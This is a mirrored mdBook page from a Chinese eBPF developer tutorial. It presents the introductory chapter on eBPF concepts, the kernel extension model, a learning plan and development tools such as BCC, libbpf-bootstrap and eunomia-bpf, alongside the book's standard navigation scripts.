mirror of
https://github.com/eunomia-bpf/bpf-developer-tutorial.git
synced 2026-02-03 18:24:27 +08:00
8083 lines
623 KiB
HTML
8083 lines
623 KiB
HTML
<!DOCTYPE HTML>
|
||
<html lang="en" class="sidebar-visible no-js light">
|
||
<head>
|
||
<!-- Book generated using mdBook -->
|
||
<meta charset="UTF-8">
|
||
<title>bpf-developer-tutorial</title>
|
||
<meta name="robots" content="noindex" />
|
||
|
||
|
||
<!-- Custom HTML head -->
|
||
|
||
<meta name="description" content="">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||
<meta name="theme-color" content="#ffffff" />
|
||
|
||
<link rel="icon" href="favicon.svg">
|
||
<link rel="shortcut icon" href="favicon.png">
|
||
<link rel="stylesheet" href="css/variables.css">
|
||
<link rel="stylesheet" href="css/general.css">
|
||
<link rel="stylesheet" href="css/chrome.css">
|
||
<link rel="stylesheet" href="css/print.css" media="print">
|
||
|
||
<!-- Fonts -->
|
||
<link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
|
||
<link rel="stylesheet" href="fonts/fonts.css">
|
||
|
||
<!-- Highlight.js Stylesheets -->
|
||
<link rel="stylesheet" href="highlight.css">
|
||
<link rel="stylesheet" href="tomorrow-night.css">
|
||
<link rel="stylesheet" href="ayu-highlight.css">
|
||
|
||
<!-- Custom theme stylesheets -->
|
||
|
||
</head>
|
||
<body>
|
||
<div id="body-container">
|
||
<!-- Provide site root to javascript -->
|
||
<script>
|
||
// Relative path from this page to the book root; empty for this page.
var path_to_root = "";
// Theme used when nothing is stored: "navy" if the OS prefers a dark scheme, "light" otherwise.
var default_theme = "light";
if (window.matchMedia("(prefers-color-scheme: dark)").matches) {
    default_theme = "navy";
}
|
||
</script>
|
||
|
||
<!-- Work around some values being stored in localStorage wrapped in quotes -->
|
||
<script>
|
||
// Strip the surrounding double quotes from stored values that were saved wrapped in quotes.
// Each value is null-checked on its own: localStorage.getItem() returns null for a
// missing key, and calling startsWith() on null would throw, which previously skipped
// the sidebar fix-up whenever no theme had been stored yet.
try {
    var theme = localStorage.getItem('mdbook-theme');
    var sidebar = localStorage.getItem('mdbook-sidebar');

    if (theme !== null && theme.startsWith('"') && theme.endsWith('"')) {
        localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
    }

    if (sidebar !== null && sidebar.startsWith('"') && sidebar.endsWith('"')) {
        localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
    }
} catch (e) { } // best effort: storage may be unavailable
|
||
</script>
|
||
|
||
<!-- Set the theme before any content is loaded, prevents flash -->
|
||
<script>
|
||
// Pick the theme class to apply: the stored choice if usable, otherwise default_theme.
var theme;
try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
// classList.add() throws on an empty or whitespace-containing token, which would abort
// this script before the 'js' class is set; treat such values as "no stored theme".
if (theme === null || theme === undefined || theme === '' || /\s/.test(theme)) { theme = default_theme; }
var html = document.querySelector('html');
// Swap the static markup classes ('no-js', 'light') for the runtime ones.
html.classList.remove('no-js');
html.classList.remove('light');
html.classList.add(theme);
html.classList.add('js');
|
||
</script>
|
||
|
||
<!-- Hide / unhide sidebar before it is displayed -->
|
||
<script>
|
||
// Decide whether the sidebar starts visible or hidden and reflect that as a class on <html>.
var html = document.querySelector('html');
var sidebar = null;
if (document.body.clientWidth < 1080) {
    // Narrow viewport: always start hidden.
    sidebar = 'hidden';
} else {
    // Wide viewport: use the stored state, falling back to 'visible'.
    try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
    if (!sidebar) {
        sidebar = 'visible';
    }
}
html.classList.remove('sidebar-visible');
html.classList.add("sidebar-" + sidebar);
|
||
</script>
|
||
|
||
<nav id="sidebar" class="sidebar" aria-label="Table of contents">
|
||
<div class="sidebar-scrollbox">
|
||
<ol class="chapter"><li class="chapter-item expanded affix "><li class="part-title">eBPF 实践教程:基于 libbpf 和 CO-RE</li><li class="chapter-item expanded "><a href="0-introduce/index.html"><strong aria-hidden="true">1.</strong> 介绍 eBPF 的基本概念、常见的开发工具</a></li><li class="chapter-item expanded "><a href="1-helloworld/index.html"><strong aria-hidden="true">2.</strong> eBPF Hello World,基本框架和开发流程</a></li><li class="chapter-item expanded "><a href="2-kprobe-unlink/index.html"><strong aria-hidden="true">3.</strong> 使用 kprobe 监测捕获 unlink 系统调用</a></li><li class="chapter-item expanded "><a href="3-fentry-unlink/index.html"><strong aria-hidden="true">4.</strong> 使用 fentry 监测捕获 unlink 系统调用</a></li><li class="chapter-item expanded "><a href="4-opensnoop/index.html"><strong aria-hidden="true">5.</strong> 捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid</a></li><li class="chapter-item expanded "><a href="5-uprobe-bashreadline/index.html"><strong aria-hidden="true">6.</strong> 使用 uprobe 捕获 bash 的 readline 函数调用</a></li><li class="chapter-item expanded "><a href="6-sigsnoop/index.html"><strong aria-hidden="true">7.</strong> 捕获进程发送信号的系统调用集合,使用 hash map 保存状态</a></li><li class="chapter-item expanded "><a href="7-execsnoop/index.html"><strong aria-hidden="true">8.</strong> 捕获进程执行/退出时间,通过 perf event array 向用户态打印输出</a></li><li class="chapter-item expanded "><a href="8-exitsnoop/index.html"><strong aria-hidden="true">9.</strong> 使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出</a></li><li class="chapter-item expanded "><a href="9-runqlat/index.html"><strong aria-hidden="true">10.</strong> 一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度</a></li><li class="chapter-item expanded "><a href="10-hardirqs/index.html"><strong aria-hidden="true">11.</strong> 使用 hardirqs 或 softirqs 捕获中断事件</a></li><li class="chapter-item expanded "><a href="11-bootstrap/index.html"><strong aria-hidden="true">12.</strong> 使用 bootstrap 开发用户态程序并跟踪 exec() 和 exit() 系统调用</a></li><li class="chapter-item expanded "><a 
href="13-tcpconnlat/index.html"><strong aria-hidden="true">13.</strong> 使用 libbpf-bootstrap 开发程序统计 TCP 连接延时</a></li><li class="chapter-item expanded "><a href="14-tcpstates/index.html"><strong aria-hidden="true">14.</strong> 使用 libbpf-bootstrap 记录 TCP 连接状态与 TCP RTT</a></li><li class="chapter-item expanded "><a href="15-javagc/index.html"><strong aria-hidden="true">15.</strong> 使用 USDT 捕获用户态 Java GC 事件耗时</a></li><li class="chapter-item expanded "><a href="16-memleak/index.html"><strong aria-hidden="true">16.</strong> 编写 eBPF 程序 Memleak 监控内存泄漏</a></li><li class="chapter-item expanded "><a href="17-biopattern/index.html"><strong aria-hidden="true">17.</strong> 编写 eBPF 程序 Biopattern 统计随机/顺序磁盘 I/O</a></li><li class="chapter-item expanded "><a href="18-further-reading/index.html"><strong aria-hidden="true">18.</strong> 更多的参考资料</a></li><li class="chapter-item expanded "><a href="19-lsm-connect/index.html"><strong aria-hidden="true">19.</strong> 使用 LSM 进行安全检测防御</a></li><li class="chapter-item expanded "><a href="20-tc/index.html"><strong aria-hidden="true">20.</strong> 使用 eBPF 进行 tc 流量控制</a></li><li class="chapter-item expanded affix "><li class="part-title">eBPF 高级特性与进阶主题</li><li class="chapter-item expanded "><a href="22-android/index.html"><strong aria-hidden="true">21.</strong> 在 Android 上使用 eBPF 程序</a></li><li class="chapter-item expanded "><a href="23-http/index.html"><strong aria-hidden="true">22.</strong> 使用 eBPF 追踪 HTTP 请求或其他七层协议</a></li><li class="chapter-item expanded "><a href="29-sockops/index.html"><strong aria-hidden="true">23.</strong> 使用 sockops 加速网络请求转发</a></li><li class="chapter-item expanded "><a href="24-hide/index.html"><strong aria-hidden="true">24.</strong> 使用 eBPF 隐藏进程或文件信息</a></li><li class="chapter-item expanded "><a href="25-signal/index.html"><strong aria-hidden="true">25.</strong> 使用 bpf_send_signal 发送信号终止进程</a></li><li class="chapter-item expanded "><a href="26-sudo/index.html"><strong aria-hidden="true">26.</strong> 使用 eBPF 添加 sudo 
用户</a></li><li class="chapter-item expanded "><a href="27-replace/index.html"><strong aria-hidden="true">27.</strong> 使用 eBPF 替换任意程序读取或写入的文本</a></li><li class="chapter-item expanded "><a href="28-detach/index.html"><strong aria-hidden="true">28.</strong> BPF的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序</a></li><li class="chapter-item expanded affix "><li class="part-title">bcc tutorial</li><li class="chapter-item expanded "><a href="bcc-documents/kernel-versions.html"><strong aria-hidden="true">29.</strong> BPF Features by Linux Kernel Version</a></li><li class="chapter-item expanded "><a href="bcc-documents/kernel_config.html"><strong aria-hidden="true">30.</strong> Kernel Configuration for BPF Features</a></li><li class="chapter-item expanded "><a href="bcc-documents/reference_guide.html"><strong aria-hidden="true">31.</strong> bcc Reference Guide</a></li><li class="chapter-item expanded "><a href="bcc-documents/special_filtering.html"><strong aria-hidden="true">32.</strong> Special Filtering</a></li><li class="chapter-item expanded "><a href="bcc-documents/tutorial.html"><strong aria-hidden="true">33.</strong> bcc Tutorial</a></li><li class="chapter-item expanded "><a href="bcc-documents/tutorial_bcc_python_developer.html"><strong aria-hidden="true">34.</strong> bcc Python Developer Tutorial</a></li></ol>
|
||
</div>
|
||
<div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
|
||
</nav>
|
||
|
||
<!-- Track and set sidebar scroll position -->
|
||
<script>
|
||
var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
// Remember the scroll offset whenever a link inside the sidebar is clicked.
sidebarScrollbox.addEventListener('click', function(event) {
    if (event.target.tagName !== 'A') {
        return;
    }
    sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
}, { passive: true });
// Read the remembered offset once, then clear it so it only applies to this page load.
var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
sessionStorage.removeItem('sidebar-scroll');
if (sidebarScrollTop) {
    // preserve sidebar scroll position when navigating via links within sidebar
    sidebarScrollbox.scrollTop = sidebarScrollTop;
} else {
    // scroll sidebar to current active section when navigating via "next/previous chapter" buttons
    var activeSection = document.querySelector('#sidebar .active');
    if (activeSection) {
        activeSection.scrollIntoView({ block: 'center' });
    }
}
|
||
</script>
|
||
|
||
<div id="page-wrapper" class="page-wrapper">
|
||
|
||
<div class="page">
|
||
<div id="menu-bar-hover-placeholder"></div>
|
||
<div id="menu-bar" class="menu-bar sticky">
|
||
<div class="left-buttons">
|
||
<button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
|
||
<i class="fa fa-bars"></i>
|
||
</button>
|
||
<button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
|
||
<i class="fa fa-paint-brush"></i>
|
||
</button>
|
||
<ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
|
||
<li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
|
||
</ul>
|
||
<button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
|
||
<i class="fa fa-search"></i>
|
||
</button>
|
||
</div>
|
||
|
||
<h1 class="menu-title">bpf-developer-tutorial</h1>
|
||
|
||
<div class="right-buttons">
|
||
<a href="print.html" title="Print this book" aria-label="Print this book">
|
||
<i id="print-button" class="fa fa-print"></i>
|
||
</a>
|
||
|
||
</div>
|
||
</div>
|
||
|
||
<div id="search-wrapper" class="hidden">
|
||
<form id="searchbar-outer" class="searchbar-outer">
|
||
<input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
|
||
</form>
|
||
<div id="searchresults-outer" class="searchresults-outer hidden">
|
||
<div id="searchresults-header" class="searchresults-header"></div>
|
||
<ul id="searchresults">
|
||
</ul>
|
||
</div>
|
||
</div>
|
||
|
||
<!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
|
||
<script>
|
||
// Mirror the sidebar state (the global `sidebar` set by an earlier script) into ARIA
// attributes and link focusability. Wrapped in a function so no new globals are created.
(function () {
    var shown = sidebar === 'visible';
    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', shown);
    document.getElementById('sidebar').setAttribute('aria-hidden', !shown);
    var links = document.querySelectorAll('#sidebar a');
    for (var i = 0; i < links.length; i++) {
        // Links in a hidden sidebar are removed from the tab order.
        links[i].setAttribute('tabIndex', shown ? 0 : -1);
    }
})();
|
||
</script>
|
||
|
||
<div id="content" class="content">
|
||
<main>
|
||
<h1 id="ebpf-入门开发实践教程零介绍-ebpf-的基本概念常见的开发工具"><a class="header" href="#ebpf-入门开发实践教程零介绍-ebpf-的基本概念常见的开发工具">eBPF 入门开发实践教程零:介绍 eBPF 的基本概念、常见的开发工具</a></h1>
|
||
<h2 id="1-ebpf简介安全和有效地扩展内核"><a class="header" href="#1-ebpf简介安全和有效地扩展内核">1. eBPF简介:安全和有效地扩展内核</a></h2>
|
||
<p>eBPF 是一项革命性的技术,起源于 Linux 内核,可以在操作系统的内核中运行沙盒程序。它被用来安全和有效地扩展内核的功能,而不需要改变内核的源代码或加载内核模块。eBPF 通过允许在操作系统内运行沙盒程序,应用程序开发人员可以在运行时,可编程地向操作系统动态添加额外的功能。然后,操作系统保证安全和执行效率,就像在即时编译(JIT)编译器和验证引擎的帮助下进行本地编译一样。eBPF 程序在内核版本之间是可移植的,并且可以自动更新,从而避免了工作负载中断和节点重启。</p>
|
||
<p>今天,eBPF被广泛用于各类场景:在现代数据中心和云原生环境中,可以提供高性能的网络包处理和负载均衡;以非常低的资源开销,做到对多种细粒度指标的可观测性,帮助应用程序开发人员跟踪应用程序,为性能故障排除提供洞察力;保障应用程序和容器运行时的安全执行,等等。可能性是无穷的,而 eBPF 在操作系统内核中所释放的创新才刚刚开始[3]。</p>
|
||
<h3 id="ebpf-的未来内核的-javascript-可编程接口"><a class="header" href="#ebpf-的未来内核的-javascript-可编程接口">eBPF 的未来:内核的 JavaScript 可编程接口</a></h3>
|
||
<p>对于浏览器而言,JavaScript 的引入带来的可编程性开启了一场巨大的革命,使浏览器发展成为几乎独立的操作系统。现在让我们回到 eBPF:为了理解 eBPF 对 Linux 内核的可编程性影响,对 Linux 内核的结构以及它如何与应用程序和硬件进行交互有一个高层次的理解是有帮助的[4]。</p>
|
||
<p><img src="0-introduce/kernel-arch.png" alt="kernel-arch" /></p>
|
||
<p>Linux 内核的主要目的是抽象出硬件或虚拟硬件,并提供一个一致的API(系统调用),允许应用程序运行和共享资源。为了实现这个目的,我们维护了一系列子系统和层,以分配这些责任[5]。每个子系统通常允许某种程度的配置,以考虑到用户的不同需求。如果不能配置所需的行为,就需要改变内核,从历史上看,改变内核的行为,或者让用户编写的程序能够在内核中运行,就有两种选择:</p>
|
||
<div class="table-wrapper"><table><thead><tr><th>内核原生支持</th><th>编写内核模块</th></tr></thead><tbody>
|
||
<tr><td>改变内核源代码,并说服Linux内核社区相信这种改变是必要的。等待几年,让新的内核版本成为一种商品。</td><td>定期修复它,因为每个内核版本都可能破坏它。由于缺乏安全边界,冒着破坏你的Linux内核的风险</td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<p>实际上,两种方案都不常用,前者成本太高,后者则几乎没有可移植性。</p>
|
||
<p>有了 eBPF,就有了一个新的选择,可以重新编程 Linux 内核的行为,而不需要改变内核的源代码或加载内核模块,同时保证在不同内核版本之间一定程度上的行为一致性和兼容性、以及安全性[6]。为了实现这个目的,eBPF 程序也需要有一套对应的 API,允许用户定义的应用程序运行和共享资源 --- 换句话说,某种意义上讲 eBPF 虚拟机也提供了一套类似于系统调用的机制,借助 eBPF 和用户态通信的机制,Wasm 虚拟机和用户态应用也可以获得这套“系统调用”的完整使用权,一方面能可编程地扩展传统的系统调用的能力,另一方面能在网络、文件系统等许多层次实现更高效的可编程 IO 处理。</p>
|
||
<p><img src="0-introduce/new-os-model.png" alt="new-os" /></p>
|
||
<p>正如上图所示,当今的 Linux 内核正在向一个新的内核模型演化:用户定义的应用程序可以在内核态和用户态同时执行,用户态通过传统的系统调用访问系统资源,内核态则通过 BPF Helper Calls 和系统的各个部分完成交互。截至 2023 年初,内核中的 eBPF 虚拟机中已经有 220 多个 Helper 系统接口,涵盖了非常多的应用场景。</p>
|
||
<p>值得注意的是,BPF Helper Call 和系统调用二者并不是竞争关系,它们的编程模型和有性能优势的场景完全不同,也不会完全替代对方。对 Wasm 和 Wasi 相关生态来说,情况也类似,专门设计的 wasi 接口需要经历一个漫长的标准化过程,但可能在特定场景能为用户态应用获取更佳的性能和可移植性保证,而 eBPF 在保证沙箱本质和可移植性的前提下,可以提供一个快速灵活的扩展系统接口的方案。</p>
|
||
<p>目前的 eBPF 仍然处于早期阶段,但是借助当前 eBPF 提供的内核接口和用户态交互的能力,经由 Wasm-bpf 的系统接口转换,Wasm 虚拟机中的应用已经几乎有能力获取内核以及用户态任意一个函数调用的数据和返回值(kprobe,uprobe...);以很低的代价收集和理解所有系统调用,并获取所有网络操作的数据包和套接字级别的数据(tracepoint,socket...);在网络包处理解决方案中添加额外的协议分析器,并轻松地编程任何转发逻辑(XDP,TC...),以满足不断变化的需求,而无需离开Linux内核的数据包处理环境。</p>
|
||
<p>不仅如此,eBPF 还有能力往用户空间任意进程的任意地址写入数据(bpf_probe_write_user[7]),有限度地修改内核函数的返回值(bpf_override_return[8]),甚至在内核态直接执行某些系统调用[9];所幸的是,eBPF 在加载进内核之前对字节码会进行严格的安全检查,确保没有内存越界等操作,同时,许多可能会扩大攻击面、带来安全风险的功能都是需要在编译内核时明确选择启用才能使用的;在 Wasm 虚拟机将字节码加载进内核之前,也可以明确选择启用或者禁用某些 eBPF 功能,以确保沙箱的安全性。</p>
|
||
<h2 id="2-关于如何学习-ebpf-相关的开发的一些建议"><a class="header" href="#2-关于如何学习-ebpf-相关的开发的一些建议">2. 关于如何学习 eBPF 相关的开发的一些建议</a></h2>
|
||
<p>本文不会对 eBPF 的原理做更详细的介绍,不过这里有一个学习规划和参考资料,也许会有一些价值:</p>
|
||
<h3 id="ebpf-入门5-7h"><a class="header" href="#ebpf-入门5-7h">eBPF 入门(5-7h)</a></h3>
|
||
<ul>
|
||
<li>Google 或者其他搜索引擎查找:eBPF</li>
|
||
<li>询问 ChatGPT 之类的东西:eBPF 是什么?</li>
|
||
</ul>
|
||
<p>推荐:</p>
|
||
<ul>
|
||
<li>阅读 ebpf 简介:<a href="https://ebpf.io/">https://ebpf.io/</a> (30min)</li>
|
||
<li>简要了解一下 ebpf 内核相关文档:<a href="https://prototype-kernel.readthedocs.io/en/latest/bpf/">https://prototype-kernel.readthedocs.io/en/latest/bpf/</a> (知道有问题去哪里查询,30min)</li>
|
||
<li>阅读 ebpf 中文入门指南:<a href="https://www.modb.pro/db/391570">https://www.modb.pro/db/391570</a> (1h)</li>
|
||
<li>有大量的参考资料:<a href="https://github.com/zoidbergwill/awesome-ebpf">https://github.com/zoidbergwill/awesome-ebpf</a> (2-3h)</li>
|
||
<li>可以选自己感兴趣的 PPT 翻一翻:<a href="https://github.com/gojue/ebpf-slide">https://github.com/gojue/ebpf-slide</a> (1-2h)</li>
|
||
</ul>
|
||
<p>回答三个问题:</p>
|
||
<ol>
|
||
<li>了解 eBPF 是什么东西?为啥要有这个玩意,不能用内核模块?</li>
|
||
<li>它有什么功能?能在 Linux 内核里面完成哪些事情?有哪些 eBPF 程序的类型和 helper(不需要知道全部,但是需要知道去哪里找)?</li>
|
||
<li>能拿来做什么?比如说在哪些场景中进行运用?网络、安全、可观测性?</li>
|
||
</ol>
|
||
<h3 id="了解如何开发-ebpf-程序10-15h"><a class="header" href="#了解如何开发-ebpf-程序10-15h">了解如何开发 eBPF 程序(10-15h)</a></h3>
|
||
<p>了解并尝试一下 eBPF 开发框架:</p>
|
||
<ul>
|
||
<li>BCC 开发各类小工具的例子:<a href="https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md">https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md</a> (跑一遍,3-4h)</li>
|
||
<li>libbpf 的一些例子:<a href="https://github.com/libbpf/libbpf-bootstrap">https://github.com/libbpf/libbpf-bootstrap</a> (选感兴趣的运行一下,并阅读一下源代码,2h)</li>
|
||
<li>基于 libbpf 和 eunomia-bpf 的教程:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> (阅读 1-10 的部分,3-4h)</li>
|
||
</ul>
|
||
<p>其他开发框架:Go 语言或者 Rust 语言,请自行搜索并且尝试(0-2h)</p>
|
||
<p>有任何问题或者想了解的东西,不管是不是和本项目相关,都可以在本项目的 discussions 里面开始讨论。</p>
|
||
<p>回答一些问题,并且进行一些尝试(2-5h):</p>
|
||
<ol>
|
||
<li>如何开发一个最简单的 eBPF 程序?</li>
|
||
<li>如何用 eBPF 追踪一个内核功能或函数?有很多种方法,举出对应的代码;</li>
|
||
<li>有哪些方案能通过用户态和内核态通信?如何从用户态向内核态传送信息?如何从内核态向用户态传递信息?举出代码示例;</li>
|
||
<li>编写一个你自己的 eBPF 程序,实现一个功能;</li>
|
||
<li>eBPF 程序的整个生命周期里面,分别在用户态和内核态做了哪些事情?</li>
|
||
</ol>
|
||
<h2 id="3-如何使用ebpf编程"><a class="header" href="#3-如何使用ebpf编程">3. 如何使用eBPF编程</a></h2>
|
||
<p>原始的eBPF程序编写是非常繁琐和困难的。为了改变这一现状,LLVM于2015年推出了可以将由高级语言编写的代码编译为eBPF字节码的功能,同时,eBPF 社区将 <code>bpf()</code> 等原始的系统调用进行了初步的封装,给出了<code>libbpf</code>库。这些库会包含将字节码加载到内核中的函数以及一些其他的关键函数。在Linux的源码包的<code>samples/bpf/</code>目录下,有大量Linux提供的基于<code>libbpf</code>的eBPF样例代码。</p>
|
||
<p>一个典型的基于 <code>libbpf</code> 的eBPF程序具有<code>*_kern.c</code>和<code>*_user.c</code>两个文件,<code>*_kern.c</code>中书写在内核中的挂载点以及处理函数,<code>*_user.c</code>中书写用户态代码,完成内核态代码注入以及与用户交互的各种任务。更为详细的教程可以参考<a href="https://www.bilibili.com/video/BV1f54y1h74r?spm_id_from=333.999.0.0">该视频</a>。然而,由于该方法仍然较难理解且入门存在一定的难度,因此现阶段的eBPF程序开发大多基于一些工具,比如:</p>
|
||
<ul>
|
||
<li>BCC</li>
|
||
<li>BPFtrace</li>
|
||
<li>libbpf-bootstrap</li>
|
||
<li>Go eBPF library</li>
|
||
</ul>
|
||
<p>此外还有比较新的工具,例如 <code>eunomia-bpf</code>。</p>
|
||
<h2 id="编写-ebpf-程序"><a class="header" href="#编写-ebpf-程序">编写 eBPF 程序</a></h2>
|
||
<p>eBPF 程序由内核态部分和用户态部分构成。内核态部分包含程序的实际逻辑,用户态部分负责加载和管理内核态部分。使用 eunomia-bpf 开发工具,只需编写内核态部分的代码。</p>
|
||
<p>内核态部分的代码需要符合 eBPF 的语法和指令集。eBPF 程序主要由若干个函数组成,每个函数都有其特定的作用。可以使用的函数类型包括:</p>
|
||
<ul>
|
||
<li>kprobe:插探函数,在指定的内核函数前或后执行。</li>
|
||
<li>tracepoint:跟踪点函数,在指定的内核跟踪点处执行。</li>
|
||
<li>raw_tracepoint:原始跟踪点函数,在指定的内核原始跟踪点处执行。</li>
|
||
<li>xdp:网络数据处理函数,拦截和处理网络数据包。</li>
|
||
<li>perf_event:性能事件函数,用于处理内核性能事件。</li>
|
||
<li>kretprobe:函数返回插探函数,在指定的内核函数返回时执行。</li>
|
||
<li>tracepoint_return:跟踪点函数返回,在指定的内核跟踪点返回时执行。</li>
|
||
<li>raw_tracepoint_return:原始跟踪点函数返回,在指定的内核原始跟踪点返回时执行。</li>
|
||
</ul>
|
||
<h3 id="bcc"><a class="header" href="#bcc">BCC</a></h3>
|
||
<p>BCC全称为BPF Compiler Collection,该项目是一个python库,
|
||
包含了完整的编写、编译、和加载BPF程序的工具链,以及用于调试和诊断性能问题的工具。</p>
|
||
<p>自2015年发布以来,BCC经过上百位贡献者的不断完善后,目前已经包含了大量随时可用的跟踪工具。<a href="https://github.com/iovisor/bcc/blob/master/docs/tutorial.md">其官方项目库</a>
|
||
提供了一个方便上手的教程,用户可以快速地根据教程完成BCC入门工作。</p>
|
||
<p>用户可以在BCC上使用Python、Lua等高级语言进行编程。
|
||
相较于使用C语言直接编程,这些高级语言具有极大的便捷性,用户只需要使用C来设计内核中的
|
||
BPF程序,其余包括编译、解析、加载等工作在内,均可由BCC完成。</p>
|
||
<p>然而,使用BCC存在一个缺点,即其兼容性并不好。基于BCC的
|
||
eBPF程序每次执行时候都需要进行编译,编译则需要用户配置相关的头文件和对应实现。在实际应用中,
|
||
相信大家也会有体会,编译依赖问题是一个很棘手的问题。也正是因此,在本项目的开发中我们放弃了BCC,
|
||
选择了可以做到一次编译-多次运行的libbpf-bootstrap工具。</p>
|
||
<h3 id="ebpf-go-library"><a class="header" href="#ebpf-go-library">eBPF Go library</a></h3>
|
||
<p>eBPF Go库提供了一个通用的eBPF库,它解耦了获取 eBPF 字节码的过程和 eBPF 程序的加载和管理,并实现了类似 libbpf 一样的 CO-RE 功能。eBPF程序通常是通过编写高级语言创建的,然后使用clang/LLVM编译器编译为eBPF字节码。</p>
|
||
<h3 id="libbpf"><a class="header" href="#libbpf">libbpf</a></h3>
|
||
<p><code>libbpf-bootstrap</code>是一个基于<code>libbpf</code>库的BPF开发脚手架,从其
|
||
<a href="https://github.com/libbpf/libbpf-bootstrap">github</a> 上可以得到其源码。</p>
|
||
<p><code>libbpf-bootstrap</code>综合了BPF社区过去多年的实践,为开发者提供了一个现代化的、便捷的工作流,实
|
||
现了一次编译,重复使用的目的。</p>
|
||
<p>基于<code>libbpf-bootstrap</code>的BPF程序对于源文件有一定的命名规则,
|
||
用于生成内核态字节码的bpf文件以<code>.bpf.c</code>结尾,用户态加载字节码的文件以<code>.c</code>结尾,且这两个文件的
|
||
前缀必须相同。</p>
|
||
<p>基于<code>libbpf-bootstrap</code>的BPF程序在编译时会先将<code>*.bpf.c</code>文件编译为
|
||
对应的<code>.o</code>文件,然后根据此文件生成<code>skeleton</code>文件,即<code>*.skel.h</code>,这个文件会包含内核态中定义的一些
|
||
数据结构,以及用于装载内核态代码的关键函数。在用户态代码<code>include</code>此文件之后调用对应的装载函数即可将
|
||
字节码装载到内核中。同样的,<code>libbpf-bootstrap</code>也有非常完备的入门教程,用户可以在<a href="https://nakryiko.com/posts/libbpf-bootstrap/">该处</a>
|
||
得到详细的入门操作介绍。</p>
|
||
<h3 id="eunomia-bpf"><a class="header" href="#eunomia-bpf">eunomia-bpf</a></h3>
|
||
<p>开发、构建和分发 eBPF 一直以来都是一个高门槛的工作,使用 BCC、bpftrace 等工具开发效率高、可移植性好,但是分发部署时需要安装 LLVM、Clang等编译环境,每次运行的时候执行本地或远程编译过程,资源消耗较大;使用原生的 CO-RE libbpf时又需要编写不少用户态加载代码来帮助 eBPF 程序正确加载和从内核中获取上报的信息,同时对于 eBPF 程序的分发、管理也没有很好的解决方案。</p>
|
||
<p><a href="https://github.com/eunomia-bpf/eunomia-bpf">eunomia-bpf</a> 是一个开源的 eBPF 动态加载运行时和开发工具链,是为了简化 eBPF 程序的开发、构建、分发、运行而设计的,基于 libbpf 的 CO-RE 轻量级开发框架。</p>
|
||
<p>使用 eunomia-bpf ,可以:</p>
|
||
<ul>
|
||
<li>在编写 eBPF 程序或工具时只编写内核态代码,自动获取内核态导出信息,并作为模块动态加载;</li>
|
||
<li>使用 WASM 进行用户态交互程序的开发,在 WASM 虚拟机内部控制整个 eBPF 程序的加载和执行,以及处理相关数据;</li>
|
||
<li>eunomia-bpf 可以将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块,跨架构和内核版本进行分发,无需重新编译即可动态加载运行。</li>
|
||
</ul>
|
||
<p>eunomia-bpf 由一个编译工具链和一个运行时库组成, 对比传统的 BCC、原生 libbpf 等框架,大幅简化了 eBPF 程序的开发流程,在大多数时候只需编写内核态代码,即可轻松构建、打包、发布完整的 eBPF 应用,同时内核态 eBPF 代码保证和主流的 libbpf, libbpfgo, libbpf-rs 等开发框架的 100% 兼容性。需要编写用户态代码的时候,也可以借助 Webassembly 实现通过多种语言进行用户态开发。和 bpftrace 等脚本工具相比, eunomia-bpf 保留了类似的便捷性, 同时不仅局限于 trace 方面, 可以用于更多的场景, 如网络、安全等等。</p>
|
||
<blockquote>
|
||
<ul>
|
||
<li>eunomia-bpf 项目 Github 地址: <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></li>
|
||
<li>gitee 镜像: <a href="https://gitee.com/anolis/eunomia">https://gitee.com/anolis/eunomia</a></li>
|
||
</ul>
|
||
</blockquote>
|
||
<h2 id="参考资料"><a class="header" href="#参考资料">参考资料</a></h2>
|
||
<ul>
|
||
<li>eBPF 介绍:<a href="https://ebpf.io/">https://ebpf.io/</a></li>
|
||
<li>BPF Compiler Collection (BCC):<a href="https://github.com/iovisor/bcc">https://github.com/iovisor/bcc</a></li>
|
||
<li>eunomia-bpf:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></li>
|
||
</ul>
|
||
